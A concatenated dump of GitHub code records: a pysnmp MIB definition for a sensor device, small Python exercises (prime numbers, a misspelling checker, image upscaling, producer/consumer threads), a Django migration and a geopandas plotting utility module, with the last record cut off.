\n#\nOctetString, Integer, ObjectIdentifier = mibBuilder.importSymbols(\"ASN1\", \"OctetString\", \"Integer\", \"ObjectIdentifier\")\nNamedValues, = mibBuilder.importSymbols(\"ASN1-ENUMERATION\", \"NamedValues\")\nValueRangeConstraint, SingleValueConstraint, ValueSizeConstraint, ConstraintsIntersection, ConstraintsUnion = mibBuilder.importSymbols(\"ASN1-REFINEMENT\", \"ValueRangeConstraint\", \"SingleValueConstraint\", \"ValueSizeConstraint\", \"ConstraintsIntersection\", \"ConstraintsUnion\")\nNotificationGroup, ModuleCompliance = mibBuilder.importSymbols(\"SNMPv2-CONF\", \"NotificationGroup\", \"ModuleCompliance\")\nIpAddress, ModuleIdentity, Counter64, MibScalar, MibTable, MibTableRow, MibTableColumn, enterprises, Bits, Unsigned32, iso, ObjectIdentity, TimeTicks, Integer32, MibIdentifier, Gauge32, NotificationType, Counter32 = mibBuilder.importSymbols(\"SNMPv2-SMI\", \"IpAddress\", \"ModuleIdentity\", \"Counter64\", \"MibScalar\", \"MibTable\", \"MibTableRow\", \"MibTableColumn\", \"enterprises\", \"Bits\", \"Unsigned32\", \"iso\", \"ObjectIdentity\", \"TimeTicks\", \"Integer32\", \"MibIdentifier\", \"Gauge32\", \"NotificationType\", \"Counter32\")\nDisplayString, TextualConvention = mibBuilder.importSymbols(\"SNMPv2-TC\", \"DisplayString\", \"TextualConvention\")\nclass PositiveInteger(Integer32):\n subtypeSpec = Integer32.subtypeSpec + ValueRangeConstraint(1, 2147483647)\n\nclass UnitType(Integer32):\n subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(0, 1, 2, 3, 4))\n namedValues = NamedValues((\"none\", 0), (\"celsius\", 1), (\"fahrenheit\", 2), (\"kelvin\", 3), (\"percent\", 4))\n\nclass OnOff(Integer32):\n subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(0, 1))\n namedValues = NamedValues((\"off\", 0), (\"on\", 1))\n\nclass InputAlarmState(Integer32):\n subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(0, 1))\n namedValues = NamedValues((\"normal\", 0), (\"alarm\", 1))\n\nclass IOName(DisplayString):\n subtypeSpec = DisplayString.subtypeSpec + ValueSizeConstraint(0, 16)\n\nclass SensorState(Integer32):\n subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(0, 1, 2, 3, 4, 5))\n namedValues = NamedValues((\"invalid\", 0), (\"normal\", 1), (\"outofrangelo\", 2), (\"outofrangehi\", 3), (\"alarmlo\", 4), (\"alarmhi\", 5))\n\nclass SensorSN(DisplayString):\n subtypeSpec = DisplayString.subtypeSpec + ValueSizeConstraint(0, 16)\n\nclass SensorName(DisplayString):\n subtypeSpec = DisplayString.subtypeSpec + ValueSizeConstraint(0, 16)\n\nclass SensorValue(Integer32):\n pass\n\nclass SensorID(Integer32):\n pass\n\nclass SensorString(DisplayString):\n subtypeSpec = DisplayString.subtypeSpec + ValueSizeConstraint(0, 10)\n\nhwgroup = MibIdentifier((1, 3, 6, 1, 4, 1, 21796))\nx390 = MibIdentifier((1, 3, 6, 1, 4, 1, 21796, 4))\nste2 = MibIdentifier((1, 3, 6, 1, 4, 1, 21796, 4, 9))\ninfo = MibIdentifier((1, 3, 6, 1, 4, 1, 21796, 4, 9, 70))\ninfoAddressMAC = MibScalar((1, 3, 6, 1, 4, 1, 21796, 4, 9, 70, 1), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 17))).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: infoAddressMAC.setStatus('mandatory')\nif mibBuilder.loadTexts: infoAddressMAC.setDescription('MAC address in text form. It is here to distinguish devices in trap messages.')\ninpTable = MibTable((1, 3, 6, 1, 4, 1, 21796, 4, 9, 1), )\nif mibBuilder.loadTexts: inpTable.setStatus('mandatory')\nif mibBuilder.loadTexts: inpTable.setDescription('A list of binary input entries.')\ninpEntry = MibTableRow((1, 3, 6, 1, 4, 1, 21796, 4, 9, 1, 1), ).setIndexNames((0, \"STE2-MIB\", \"inpIndex\"))\nif mibBuilder.loadTexts: inpEntry.setStatus('mandatory')\nif mibBuilder.loadTexts: inpEntry.setDescription('An entry containing information applicable to a particular binary input.')\ninpIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 21796, 4, 9, 1, 1, 1), PositiveInteger())\nif mibBuilder.loadTexts: inpIndex.setStatus('mandatory')\nif mibBuilder.loadTexts: inpIndex.setDescription('The binary input index.')\ninpValue = MibTableColumn((1, 3, 6, 1, 4, 1, 21796, 4, 9, 1, 1, 2), OnOff()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: inpValue.setStatus('mandatory')\nif mibBuilder.loadTexts: inpValue.setDescription('The binary input value.')\ninpName = MibTableColumn((1, 3, 6, 1, 4, 1, 21796, 4, 9, 1, 1, 3), IOName()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: inpName.setStatus('mandatory')\nif mibBuilder.loadTexts: inpName.setDescription('The binary input name.')\ninpAlarmState = MibTableColumn((1, 3, 6, 1, 4, 1, 21796, 4, 9, 1, 1, 4), InputAlarmState()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: inpAlarmState.setStatus('mandatory')\nif mibBuilder.loadTexts: inpAlarmState.setDescription('The binary input alarm state.')\nsensTable = MibTable((1, 3, 6, 1, 4, 1, 21796, 4, 9, 3), )\nif mibBuilder.loadTexts: sensTable.setStatus('mandatory')\nif mibBuilder.loadTexts: sensTable.setDescription('A list of sensor table entries. The number of entries corresponds with number of detected sensors.')\nsensEntry = MibTableRow((1, 3, 6, 1, 4, 1, 21796, 4, 9, 3, 1), ).setIndexNames((0, \"STE2-MIB\", \"sensIndex\"))\nif mibBuilder.loadTexts: sensEntry.setStatus('mandatory')\nif mibBuilder.loadTexts: sensEntry.setDescription('An entry containing information applicable to a particular sensor.')\nsensIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 21796, 4, 9, 3, 1, 1), PositiveInteger())\nif mibBuilder.loadTexts: sensIndex.setStatus('mandatory')\nif mibBuilder.loadTexts: sensIndex.setDescription('The sensor index.')\nsensName = MibTableColumn((1, 3, 6, 1, 4, 1, 21796, 4, 9, 3, 1, 2), SensorName()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: sensName.setStatus('mandatory')\nif mibBuilder.loadTexts: sensName.setDescription('The sensor name.')\nsensState = MibTableColumn((1, 3, 6, 1, 4, 1, 21796, 4, 9, 3, 1, 3), SensorState()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: sensState.setStatus('mandatory')\nif mibBuilder.loadTexts: sensState.setDescription('The sensor state.')\nsensString = MibTableColumn((1, 3, 6, 1, 4, 1, 21796, 4, 9, 3, 1, 4), SensorString()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: sensString.setStatus('mandatory')\nif mibBuilder.loadTexts: sensString.setDescription('The string representation of sensor value.')\nsensValue = MibTableColumn((1, 3, 6, 1, 4, 1, 21796, 4, 9, 3, 1, 5), SensorValue()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: sensValue.setStatus('mandatory')\nif mibBuilder.loadTexts: sensValue.setDescription('The integer (decimal * 10) representation of sensor value.')\nsensSN = MibTableColumn((1, 3, 6, 1, 4, 1, 21796, 4, 9, 3, 1, 6), SensorSN()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: sensSN.setStatus('mandatory')\nif mibBuilder.loadTexts: sensSN.setDescription('The sensor Serial number.')\nsensUnit = MibTableColumn((1, 3, 6, 1, 4, 1, 21796, 4, 9, 3, 1, 7), UnitType()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: sensUnit.setStatus('mandatory')\nif mibBuilder.loadTexts: sensUnit.setDescription('The sensor unit.')\nsensID = MibTableColumn((1, 3, 6, 1, 4, 1, 21796, 4, 9, 3, 1, 8), UnitType()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: sensID.setStatus('mandatory')\nif mibBuilder.loadTexts: sensID.setDescription('The sensor ID.')\nmibBuilder.exportSymbols(\"STE2-MIB\", infoAddressMAC=infoAddressMAC, inpIndex=inpIndex, sensUnit=sensUnit, sensIndex=sensIndex, sensString=sensString, ste2=ste2, OnOff=OnOff, info=info, SensorValue=SensorValue, sensName=sensName, inpName=inpName, InputAlarmState=InputAlarmState, SensorState=SensorState, sensSN=sensSN, inpTable=inpTable, sensEntry=sensEntry, sensID=sensID, hwgroup=hwgroup, IOName=IOName, x390=x390, sensTable=sensTable, SensorString=SensorString, inpValue=inpValue, SensorID=SensorID, SensorName=SensorName, inpEntry=inpEntry, SensorSN=SensorSN, UnitType=UnitType, PositiveInteger=PositiveInteger, sensValue=sensValue, inpAlarmState=inpAlarmState, sensState=sensState)\n","repo_name":"cisco-kusanagi/mibs.snmplabs.com","sub_path":"pysnmp-with-texts/STE2-MIB.py","file_name":"STE2-MIB.py","file_ext":"py","file_size_in_byte":8168,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"35"} +{"seq_id":"9935701291","text":"#Print the prime numbers which are between 1 to entered limit number (n).\n\nlist_len = int(input(\"Enter a number : \"))\nprime_num = []\nfor i in range(1, list_len):\n is_prime = True\n for j in range(2,i):\n if i % j == 0:\n is_prime = False\n break\n if is_prime:\n prime_num.append(i)\nprint(prime_num)","repo_name":"MarkOneil7574/Assignments","sub_path":"Assignment_6_Prime_Numbers_List.py","file_name":"Assignment_6_Prime_Numbers_List.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"11169023341","text":"\"\"\"\nCreate a function mispelled(word1, word2):\n\nmispelled('versed', 'xersed') # returns True\nmispelled('versed', 'applb') # returns False\nmispelled('versed', 'v5rsed') # returns True\nmispelled('1versed', 'versed') # returns True\nmispelled('versed', 'versed') #returns True \nIt checks if the word2 differs from word1 by at most one character.\n\nThis can include an extra char at the end or the beginning of either of words.\n\nIn the tests that expect true, the mispelled word will always differ mostly by one character. If the two words are the same, return True.\n\n\"\"\"\n\n# my solution\ndef mispelled(word1,word2):\n if len(word1) == len(word2):\n count = 0\n for i in range(len(word1)):\n if word1[i] != word2[i]:\n count += 1\n return count <= 1\n if len(word1) > len(word2):\n if word1[1:] == word2 or word1[:-1] == word2: return True\n else: return False\n if len(word2) > len(word1):\n if word2[1:] == word1 or word2[:-1] == word1: return True\n else: return False\n\n# other clever solution\n\ndef mispelled(word1, word2):\n l1, l2 = len(word1), len(word2)\n if l1 == l2:\n return sum(1 for a, b in zip(word1, word2) if a != b) <= 1\n if l1 - l2 == 1:\n return word1.startswith(word2) or word1.endswith(word2)\n if l1 - l2 == -1:\n return word2.startswith(word1) or word2.endswith(word1)\n return False","repo_name":"burd5/codewars_python","sub_path":"mispelled_word.py","file_name":"mispelled_word.py","file_ext":"py","file_size_in_byte":1398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"37430656748","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Categoria',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('titulo', models.CharField(max_length=140)),\n ],\n ),\n migrations.CreateModel(\n name='Huerto',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('titulo', models.CharField(max_length=140)),\n ('seguidores', models.IntegerField(default=0)),\n ('usuario', models.ForeignKey(to=settings.AUTH_USER_MODEL)),\n ],\n ),\n migrations.CreateModel(\n name='Publicacion',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('titulo', models.CharField(max_length=140)),\n ('votos', models.IntegerField(default=0)),\n ('favoritos', models.IntegerField(default=0)),\n ('timestamp', models.DateTimeField(auto_now_add=True)),\n ('imagen', models.ImageField(null=True, upload_to=b'media/', blank=True)),\n ('categoria', models.ForeignKey(to='Feed.Categoria')),\n ('usuario', models.ForeignKey(to=settings.AUTH_USER_MODEL)),\n ],\n ),\n ]\n","repo_name":"LagunaISW/Midori","sub_path":"Feed/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"40529716973","text":"def solution(img):\n size=64\n shape = [len(img[0]), len(img)]\n if shape[0] != shape[1]:\n print(\"Please enter a square image\")\n return\n dim = shape[0]\n if size < dim:\n print(\"Please enter a size greater than the original image\")\n return\n new_image = []\n growth_factor = int(size / dim)\n for row in img:\n new_row = []\n for pix in row:\n for _ in range(growth_factor):\n new_row.append(pix)\n for _ in range(growth_factor):\n new_image.append(new_row)\n return new_image","repo_name":"banana-galaxy/challenges","sub_path":"challenge1/gaba.py","file_name":"gaba.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"35"} +{"seq_id":"31562437887","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [(\"msgs\", \"0012_message_labels\")]\n\n operations = [\n migrations.AlterField(\n model_name=\"label\",\n name=\"org\",\n field=models.ForeignKey(\n related_name=\"labels\", verbose_name=\"Organization\", to=\"orgs.Org\", on_delete=models.PROTECT\n ),\n )\n ]\n","repo_name":"rapidpro/casepro","sub_path":"casepro/msgs/migrations/0013_auto_20160223_0917.py","file_name":"0013_auto_20160223_0917.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"35"} +{"seq_id":"39587689737","text":"import numpy as np\nimport pandas as pd\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom pandas.plotting import table\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport geopandas as gp\nimport shapely\nfrom shapely.geometry import Point,LineString,Polygon,MultiPolygon\nfrom scipy.spatial import cKDTree\n\n# from osgeo import ogr\n# from osgeo import gdal,ogr,osr,gdalnumeric\nimport shapefile as shp # Requires the pyshp package\nimport matplotlib.pyplot as plt\n\nimport contextily as ctx\n\ncrs = {'init':'epsg:4326'}\nctxprovider=ctx.sources.OSM_A\n\n''' Working with Points \n Some of these can be lambda for apply/map functions \n '''\ndef pt2geom(fdf,latcol='LAT',lngcol='LONG'):\n geometry = [Point(xy) for xy in zip(pd.to_numeric(fdf[lngcol]),pd.to_numeric(fdf[latcol]))]\n return geometry\n\ndef strpt2shapelypt(strin):\n if isinstance(strin,Point):\n return strin\n tlst = strin.split(' ')\n lng = float(tlst[1].replace('(',''))\n lat = float(tlst[2].replace(')',''))\n pt = Point(lng,lat)\n return pt\n\ndef strply2shapelyply(cell): # map: lambda cell has string Polygon\n if isinstance(cell,str):\n return shapely.wkt.loads(cell)\n else:\n return cell\n \ndef str2shapely(cell): # map: lambda cell has string Polygon or Point\n try:\n if isinstance(cell,str):\n # print(cell)\n if 'POINT' in cell:\n return strpt2shapelypt(cell)\n elif 'POLYGON' in cell:\n return strply2shapelyply(cell)\n else:\n print(\"Unknown Type: %s\" % cell)\n return np.nan\n elif np.isnan(cell):\n return cell\n else:\n print(\"Not String: {} {}\".format(cell,type(cell)))\n except:\n# print(\"Not String: {} {}\".format(cell,type(cell)))\n pass\n return cell\n\ndef flt2shapelypt(fdf,loncol=None,latcol=None): # Longitude first\n return Point(fdf[loncol],fdf[latcol])\n\ndef strpts2dist(fpt1,fpt2): # Distance in miles\n fdf = dfptstr2geom(pd.DataFrame([pt1,pt2],columns=['geometry'])).reset_index()\n fgp = df2gp(fdf,geom=fdf['geometry'])\n fdist = geodist(fgp)\n return fdist\n\ndef shapelypt2strpt(ptin):\n return ptin if isinstance(ptin,str) else str(ptin)\n\n''' Working with DataFrames '''\ndef dfstr2shapely(fdf,subset=['geometry']):\n for col in subset:\n fdf[col] = fdf[col].map(str2shapely)\n return fdf\ndef dfptstr2geom(fdf):\n geometry = fdf['geometry'].map(strpt2shapelypt)\n return geometry\n\ndef dfstrgeom2ptgeom(fdf):\n fdf['geometry']= dfptstr2geom(fdf)\n return fdf\n\ndef df2gp(fdf,geometry=None):\n if geometry is None:\n geometry = fdf['geometry']\n if isinstance(geometry.iloc[0], str):\n geometry = geometry.map(str2shapely)\n return gp.GeoDataFrame(fdf,crs=crs,geometry=geometry)\n\n''' Working with GeoPandas '''\ndef geodist(gpdf): # in miles\n ''' Distance between two adjacent rows '''\n gpdf = gpdf.to_crs(epsg=3310)\n dist = gpdf.distance(gpdf.shift()) * 0.00062137\n return (dist)\n\ndef geodist2(gpdf,col1='geometry',col2=None): # in miles\n ''' Distance between two geometry columns '''\n fgp = gpdf.copy()\n fgp1 = fgp.to_crs(epsg=3310)\n fgp[col1] = fgp[col2]\n fgp2 = fgp.to_crs(epsg=3310)\n dist = fgp1.distance(fgp2) * 0.00062137\n return (dist)\n\ndef findnearest(fdfA, fdfB,k=1,units='mile'):\n ''' Finds the nearest K points to each row of fdfA from fdfB \n Returns a pandas dataframe not a geopandas dataframe '''\n gdA = fdfA.copy().reset_index()\n gdB = fdfB.copy().reset_index()\n nA = np.array(list(zip(gdA.geometry.x, gdA.geometry.y)) )\n nB = np.array(list(zip(gdB.geometry.x, gdB.geometry.y)) )\n \n ''' Find Nearest '''\n btree = cKDTree(nB)\n distlst, idxlst = btree.query(nA, k=k)\n \n ''' Join with fdfA '''\n distcols = [\"Dist_NEAR{}\".format(ii) for ii in range(0,k)] \n distdf = pd.DataFrame(distlst,columns=distcols)\n if units == 'mile': # default radians\n distdf[distcols] = distdf[distcols].apply(lambda col: col*66) # convert to miles\n idxcols = [\"NEAR{}\".format(ii) for ii in range(0,k)] \n idxdf = pd.DataFrame(idxlst,columns=idxcols)\n gdf = pd.concat([gdA.reset_index(drop=True),distdf,idxdf],axis=1)\n gdB = gdB.drop(columns=['index']).reset_index()\n gdBcol = gdB.columns\n for nearcol in idxcols:\n gdC = gdB.copy()\n gdC.columns = gdC.columns.map(lambda col: str(col) + '_' + nearcol) # force suffix\n gdf = gdf.set_index(nearcol).join(gdC) \\\n .reset_index().rename(columns={'level_0':nearcol})\n gdf = gdf.drop(columns=idxcols + ['index'])\n \n ''' Clean-up '''\n for var in [gdA,gdB,gdC,nA,nB,distdf,idxdf,distlst,idxlst]:\n del var\n\n return gdf\n\n''' GeoPandas Plotting '''\ngp_deffont = {'fontweight':'ultralight','color':'blue','size':16,'fontfamily':'cursive','style':'normal'}\ndef gp_getDefFont(): # Use if you want to change some of the options\n return gp_deffont\ndef gp_setAxesScales(ax,xscaledict={},yscaledict={},option=None,**kwargs): # TODO x and y limits\n if not option is None:\n ax.axis(option)\ndef gp_setAxesLabels(ax,xlabel='',ylabel='',font = {'size':16}):\n ax.set_xlabel(xlabel)\n ax.set_ylabel(ylabel)\ndef gp_setTitle(ax,title,**kwargs):\n ax.set_title(title,**kwargs)\ndef getPolygon(bnddf):\n return Polygon([(p.x,p.y) for p in bnddf['geometry']])\ndef getPolygonXY(bnddf):\n return getPolygon(bnddf).exterior.xy\n\ndef getCentroid(row): # Apply-Lambda\n geom = row.geometry\n if isinstance(geom, Polygon):\n# print(\"Is Polygon\",geom.centroid)\n return geom.centroid\n else:\n return np.nan\n\ndef getPointXY(ptdf):\n x = ptdf['geometry'].x\n y = ptdf['geometry'].y\n return x,y\ndef plot_points(ptdf,ax,s=50,**kwargs):\n x,y = getPointXY(ptdf)\n ax.scatter(x,y,s=s,alpha=0.5,**kwargs)\ndef plot_poly_boundary(bnddf,ax,**kwargs):\n x,y = getPolygonXY(bnddf)\n ax.plot(x,y)\n \ndef gp_scatterplot(fgp,ax = None,ptype='Points',mapon=False,figsize=(10,10),ctxprovider=ctxprovider,**kwargs):\n if mapon:\n fgp = fgp.to_crs(epsg=3857)\n if ax is None:\n ax = plt.figure(figsize=figsize).add_subplot(111)\n plot_points(fgp,ax)\n if mapon:\n ctx.add_basemap(ax, source=ctxprovider)\n return ax\ndef gp_plot_poly_boundary(fgp,ax=None,figsize=(10,10),mapon=True,ctxprovider=ctxprovider,**kwargs):\n ''' fgp geometry is list of points containing the boundary '''\n if mapon:\n fgp = fgp.to_crs(epsg=3857) \n if ax is None:\n ax = plt.figure(figsize=figsize).add_subplot(111)\n x,y = getPolygonXY(fgp)\n ax.plot(x,y)\n if mapon:\n ctx.add_basemap(ax, source=ctxprovider)\n return ax\n\ndef gp_getInside(cell, pgp,col):\n ''' Find which polygon a point is in. cell is a point, pgp is a gp of polygons and keys, \n col is the column containing the key value in pgp '''\n lz = np.nan\n lz = pgp.apply(lambda row: row[col] if cell.within(row['geometry']) else lz,axis=1).dropna()\n if lz.shape[0] > 1:\n dumpdf(lz)\n if lz.shape[0] == 0:\n return np.nan\n return lz.iloc[0]\n\ndef getPolyXY(poly):\n if isinstance(poly,Polygon):\n return [(poly.exterior.xy)]\n if isinstance(poly,MultiPolygon):\n subpolyXYlst = []\n for subpoly in poly:\n x,y = subpoly.exterior.xy\n subpolyXYlst.append((x,y))\n return subpolyXYlst\n else:\n print(\"isnot polygon\")\n print(type(poly),poly)\n return [(np.nan,np.nan)]\ndef plotPoly(row,ax,**kwargs): # Lambda\n xylst = getPolyXY(row['geometry'])\n for tup in xylst: # Single tuple for Polygon, multiple tuple for multipolygon\n x = tup[0]\n y = tup[1]\n if x != np.nan:\n ax.plot(x,y,**kwargs)\ndef gp_plotPoly(fgp,mapon=False, ax=None,figsize=(10,10),ctxprovider=ctxprovider,**kwargs): \n ''' GeoPandas DataFrame with 'geometry' containing Polygons '''\n if ax is None:\n ax = plt.figure(figsize=figsize).add_subplot(111) \n if mapon:\n fgp = fgp.to_crs(epsg=3857)\n devnull = fgp.apply(plotPoly,ax=ax,**kwargs,axis=1)\n if mapon:\n ctx.add_basemap(ax, source=ctxprovider)\n return ax\n\ndef gp_plotPoint(fgp,ax,s=50,alpha=0.5,**kwargs): # Lambda\n x,y = getPointXY(fgp)\n ax.scatter(x,y,s=s,alpha=alpha,**kwargs)\ndef gp_plotPoints(fgp,ax = None,ptype='Points',mapon=False, title=None,\n figsize=(10,10),ctxprovider=ctxprovider,**kwargs):\n ''' GeoPandas DataFrame with 'geometry'containing Points '''\n if mapon:\n fgp = fgp.to_crs(epsg=3857)\n if ax is None:\n ax = plt.figure(figsize=figsize).add_subplot(111)\n gp_plotPoint(fgp,ax,**kwargs)\n gp_setAxesScales(ax,option=False)\n if not title is None:\n gp_setTitle(ax,title)\n if mapon:\n ctx.add_basemap(ax, source=ctxprovider)\n return ax\ndef gp_plotLines(fgp,ax = None,geocol='geometry',ptype='Lines',mapon=False, title=None,\n figsize=(10,10),ctxprovider=ctxprovider,**kwargs):\n ''' GeoPandas DataFrame with 'geometry' containing LineStrings '''\n ''' Note: color parameter is 'color' '''\n if geocol != 'geometry':\n fgp['geometry'] = fgp[geocol] \n if mapon:\n fgp = fgp.to_crs(epsg=3857)\n if ax is None:\n ax = plt.figure(figsize=figsize).add_subplot(111)\n ax = fgp.plot(axes=ax,**kwargs)\n gp_setAxesScales(ax,option=False)\n if not title is None:\n gp_setTitle(ax,title)\n if mapon:\n ctx.add_basemap(ax, source=ctxprovider)\n return ax\n\ndef gp_Points2Lines(fgp):\n fgp['geometryshift'] = fgp['geometry'].shift(-1)\n fgp = fgp.dropna()\n return fgp.apply(lambda row: LineString([row['geometry'],row['geometryshift']]), axis = 1)\n \ndef gp_getMarkerSize(ser,maxsize=1000,minsize=30): # Return normalized marker series\n sermax = ser.max()\n retser = ser.map(lambda cell: max(minsize, cell*maxsize/sermax))\n return retser\ndef gp_getCentroid(fdf): # Lambda\n return fdf['geometry'].map(getCentroidPoly)\n# return row.geometry.centroid if isinstance(row.geometry, Polygon) else np.nan\n\n''' Point Labels '''\ndef makeLabel(row,delimiter=', ',labelcol=[],**kwds): # Apply-Lambda\n retlab = ''\n for col in labelcol:\n colval = str(row[col])\n retlab += colval + delimiter\n retlab = retlab[:-2] # remove trailing delimiter and space\n return retlab\ndef gp_plotLabel(row,ax=None,xoffset=5000,yoffset=0,**kwds): # Apply-Lambda\n x,y=getPointXY(row)\n ax.text(x+xoffset,y+yoffset,row['label'],**kwds)\n\ndef gp_plotLabels(fgp,labelcol=[],ax=None,mapon=False,includegeom=False,delimiter=', ', # TODO Add geometry\n figsize=(10,10),fontdict=gp_deffont,title=None,ctxprovider=ctxprovider,**kwargs):\n ''' GeoPandas DataFrame with 'geometry'containing Points '''\n if mapon:\n fgp = fgp.to_crs(epsg=3857)\n if ax is None:\n ax = plt.figure(figsize=figsize).add_subplot(111)\n gp_setAxesScales(ax,option=False)\n if len(labelcol) > 0:\n tlabgp = fgp[labelcol]\n tlabgp['geometry'] = fgp['geometry']\n tlabgp['label'] = tlabgp.apply(makeLabel,labelcol=labelcol,delimiter=delimiter,**kwargs,axis=1)\n tlabgp.apply(gp_plotLabel,ax=ax,fontdict=fontdict,**kwargs,axis=1)\n if not title is None:\n gp_setTitle(ax,title)\n if mapon:\n ctx.add_basemap(ax, source=ctxprovider)\n return ax\n\ndef gp_printCTXproviders(printon=False):\n provlst=[]\n for key in ctx.providers:\n if 'url' in ctx.providers[key].keys():\n provlst.append(ctx.providers[key]['name'])\n else:\n for subkey in ctx.providers[key]:\n try:\n provlst.append(ctx.providers[key][subkey]['name'])\n except:\n pass\n provlst.sort()\n if printon:\n devnull = [\"ctx.providers.\"+print(name) for name in provlst]\n return provlst\n\n''' Shapefiles '''\ndef getShapeFile(fn):\n return shp.Reader(fn)\ndef gp_readShapefile(fn): \n return gp.read_file(fn)\ndef plotShapeFile(sf, ax = None, figsize=(20,20), **kwargs):\n if ax is None:\n ax = plt.figure(figsize=figsize).add_subplot(111)\n for shape in sf.shapeRecords():\n x = [i[0] for i in shape.shape.points[:]]\n y = [i[1] for i in shape.shape.points[:]]\n ax.plot(x,y)\n return ax\ndef getCentroidPoly(geom): \n return geom.centroid if isinstance(geom, Polygon) else np.nan \n\n### Tile provider sources ###\n\n# ST_TONER = 'http://tile.stamen.com/toner/tileZ/tileX/tileY.png'\n# ST_TONER_HYBRID = 'http://tile.stamen.com/toner-hybrid/tileZ/tileX/tileY.png'\n# ST_TONER_LABELS = 'http://tile.stamen.com/toner-labels/tileZ/tileX/tileY.png'\n# ST_TONER_LINES = 'http://tile.stamen.com/toner-lines/tileZ/tileX/tileY.png'\n# ST_TONER_BACKGROUND = 'http://tile.stamen.com/toner-background/tileZ/tileX/tileY.png'\n# ST_TONER_LITE = 'http://tile.stamen.com/toner-lite/tileZ/tileX/tileY.png'\n\n# ST_TERRAIN = 'http://tile.stamen.com/terrain/tileZ/tileX/tileY.png'\n# ST_TERRAIN_LABELS = 'http://tile.stamen.com/terrain-labels/tileZ/tileX/tileY.png'\n# ST_TERRAIN_LINES = 'http://tile.stamen.com/terrain-lines/tileZ/tileX/tileY.png'\n# ST_TERRAIN_BACKGROUND = 'http://tile.stamen.com/terrain-background/tileZ/tileX/tileY.png'\n\n# ST_WATERCOLOR = 'http://tile.stamen.com/watercolor/tileZ/tileX/tileY.png'\n\n# # OpenStreetMap as an alternative\n# OSM_A = 'http://a.tile.openstreetmap.org/tileZ/tileX/tileY.png'\n# OSM_B = 'http://b.tile.openstreetmap.org/tileZ/tileX/tileY.png'\n# OSM_C = 'http://c.tile.openstreetmap.org/tileZ/tileX/tileY.png'\n\n ","repo_name":"cmusatyalab/PyEdgeSim","sub_path":"lib/gputils.py","file_name":"gputils.py","file_ext":"py","file_size_in_byte":13583,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"35"} +{"seq_id":"12620770637","text":"from threading import Thread\nfrom random import randint\nfrom time import sleep\n\nclass Consumer(Thread):\n\t\"\"\"\n\tPops integers from a queue.\n\t\"\"\"\n\t\n\tdef __init__ (self, t, q, n, p):\n\t\t\"\"\"\n\t\tThread t to pop n integers from q.\n\t\t\"\"\"\n\t\tThread.__init__(self, name=t)\n\t\tself.queue = q\n\t\tself.amount = n\n\t\tself.pace = p\n\t\n\tdef run(self):\n\t\t\"\"\"\n\t\tPops integers at some pace.\n\t\t\"\"\"\n\t\tprint (\"Consumption starts...\")\n\t\tfor i in range(0, self.amount):\n\t\t\trnd = randint(1, self.pace)\n\t\t\tprint(self.getName() + \" sleeps %d seconds\" %rnd)\n\t\t\tsleep(rnd)\n\t\t\t\n\t\t\twhile True:\n\t\t\t\ttry:\n\t\t\t\t\ti = self.queue.pop(0)\n\t\t\t\t\tprint (\"Popped %d from queue\" %i)\n\t\t\t\t\tbreak\n\t\t\t\texcept IndexError:\n\t\t\t\t\tprint (\"Espera un segundo...\")\n\t\t\t\t\tsleep(1)\n\t\tprint(\"Consumption terminated\")\n\t\t\n\t\n\t\ndef main():\n\t\"\"\"\n\tSimulates consumption on somo queue\n\t\"\"\"\n\tque = range(5)\n\tcns = Consumer('Consumer', que, 5, 10)\n\tcns.start()\n\tcns.join()\n\t\nif __name__ == '__main__':\n\tmain()\n\t\nclass Producer(Thread):\n \"\"\"\n\tAppends integers to a queue.\n\t\"\"\"\n def __init__(self, t, q, a, b, p):\n \"\"\"\n Thread t to add integers in [a,b] to q, sleeping between 1 and p seconds.\n \"\"\"\n Thread.__init__(self, name=t)\n self.queue = q\n self.begin = a\n self.end = b\n self.pace = p \n \n def run(self):\n \"\"\"\n\t\tproduces integers at some 